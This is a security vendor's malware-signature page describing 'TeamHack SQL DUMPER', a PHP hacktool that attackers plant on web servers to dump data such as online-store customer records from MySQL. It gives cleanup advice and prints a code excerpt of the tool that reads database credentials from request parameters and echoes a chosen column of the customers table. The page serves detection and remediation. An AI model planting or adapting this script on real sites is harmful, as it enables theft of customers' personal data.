Malware Signatures

  1. Home
  2. Docs
  3. Malware Signatures
  4. php.hacktool.sql_teamhack.001


Many popular web applications such as WordPress, Joomla, vBulletin, osCommerce, etc. rely on database, specifically on MySql.
Most of the data those application work with is stored in the database. And quite a few applications store configuration information in database as well.
That's why hackers don't forget about it and try to exploit it as much as possible. For example, hackers inject spammy links and scripts directly into posts, stored in the database.
Or they chnage configuration records to make site redirect visitors to third-party sites. To work with MySql databases hackers use various scripts: from highly targeted
customized scripts that can do only one specific thing to scripts that provide access to broad MySql functionality, such as adminer scripts..

TeamHack SQL DUMPER is a simple tool that dumps data from a specified colums of selected tables. Typically used to steal data (for example client data from online stores)


Any servers with enabled PHP and installed MySQL


Delete the malicious script and scan your server for other types of malware and specifically for backdoors.
You can also sign up with us and let our team remove the malware for you.


... excerpts ...

<title>TeamHack SQL DUMPER</title>
$dbhost = $_REQUEST['dbhost'];
$user= $_REQUEST['user'];
$pass= $_REQUEST['pass'];
$dbname= $_REQUEST['dbname'];
$table = "customers";


$column = $_REQUEST['column'];
if (empty($column)) {echo "choose 1 column to see data";} else {
$data = mysql_query("SELECT * FROM $table");
while ( $mask = mysql_fetch_array($data)){
echo "$mask[$column]n";}